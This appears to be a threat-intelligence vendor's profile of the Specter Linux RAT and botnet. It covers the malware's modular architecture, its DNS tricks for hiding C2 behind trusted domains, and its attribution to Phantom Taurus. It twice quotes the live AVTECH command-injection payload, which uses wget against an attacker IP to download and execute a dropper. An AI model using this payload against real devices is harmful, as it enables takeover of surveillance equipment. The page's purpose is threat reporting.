Specter is a Linux-based modular remote access trojan and botnet malware family primarily associated with the compromise of internet-exposed embedded surveillance devices, especially AVTECH IP cameras, NVRs, and DVRs. It has been observed exploiting a command-injection vulnerability in AVTECH web interfaces to gain execution on vulnerable devices and deploy a staged malware architecture composed of a dropper, a loader, and on-demand plugins.
The dropper is responsible for unpacking and launching the core loader along with required runtime components. The loader handles configuration decryption, command-and-control initialization, encrypted communications, host profiling, and plugin management. Specter uses protected C2 communications incorporating TLS together with additional encryption and compression layers, and it can dynamically request and load plugins from its operators when needed. Documented plugin capabilities include interactive shell access, file management, SOCKS5 proxying, device information reporting, downloading and executing additional binaries, and script or command execution. These features make Specter suitable for persistent remote control and post-compromise operational use on Linux-based embedded systems.
Specter has also been notable for its command-and-control tradecraft. In later activity, operators abused weaknesses in managed DNS hosting to make reputable-looking domains resolve to attacker-controlled infrastructure when queried through selected name servers, allowing the malware to disguise C2 traffic behind trusted brand domains without compromising those organizations. This technique complicates blacklist- and allowlist-based detection.
Beyond criminal botnet activity, Specter has been reported as part of the customized tooling used by the China-aligned espionage actor Phantom Taurus. In that context, Specter appears within a broader toolset used in long-term intelligence collection operations targeting government and telecommunications organizations across Africa, the Middle East, and Asia. High-confidence reporting supports Specter as a Linux RAT with modular remote-control, proxying, file-transfer, and payload-delivery functions, particularly effective against vulnerable embedded video-surveillance infrastructure.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
These include the Specter malware family, Ntospy and NET-STAR, a newly identified malware suite.
15 distinct techniques documented for this family, organized by ATT&CK tactic.
Specter spread its Dropper samples through AVTECH IP Camera / NVR / DVR Devices vulnerabilities... The payload being used is as follows: GET /cgi-bin/nobody/Search.cgi?... username=admin ;XmlAp r Account.User1.Username>$(wget http://45.76.70.163:80/style/351f37b2764041759c859202c529aefc.css -O /tmp/webstatus;chmod 755 /tmp/webstatus;/tmp/webstatus;rm -f /tmp/webstatus;)&password=admin
username=admin ;XmlAp r Account.User1.Username>$(wget http://45.76.70.163:80/style/351f37b2764041759c859202c529aefc.css -O /tmp/webstatus;chmod 755 /tmp/webstatus;/tmp/webstatus;rm -f /tmp/webstatus;)&password=admin
Our BotMon tracking system recently highlighted that the Specter botnet family started to use two domains api.github.com and www.ibm.com as C2 domains for its control communicate. | the auto-extracted C2 was api.github.com on its port 80 ... how can Specter uses api.github.com as its C2 communication node and passes control traffic back and forth between github and its bots?
The main functions of Specter are File management Download and upload management... Executing C2 to deliver executable files... SSF Plugin is to download an executable file from a specified server to a local /tmp/runtimes/httpd_log_output file, and then execute it.
The new Specter sample send dns request to C2 ... craft the dns request packets and the ask the DNS IPs described above about the FQDN to finally get the C2 address.
76 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Customized malware family used by the Phantom Taurus espionage actor as part of its implant/tooling set.
A named malware family used by Phantom Taurus; specific capabilities are not described in the provided content.
Custom malware family used by Phantom Taurus; specific functionality not detailed in the provided content beyond being part of the actor’s bespoke toolset (with named components TunnelSpecter and SweetSpecter listed in TTPs).
Custom malware family used by Phantom Taurus; the content does not provide technical details beyond naming variants (TunnelSpecter, SweetSpecter) as part of the actor toolset.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.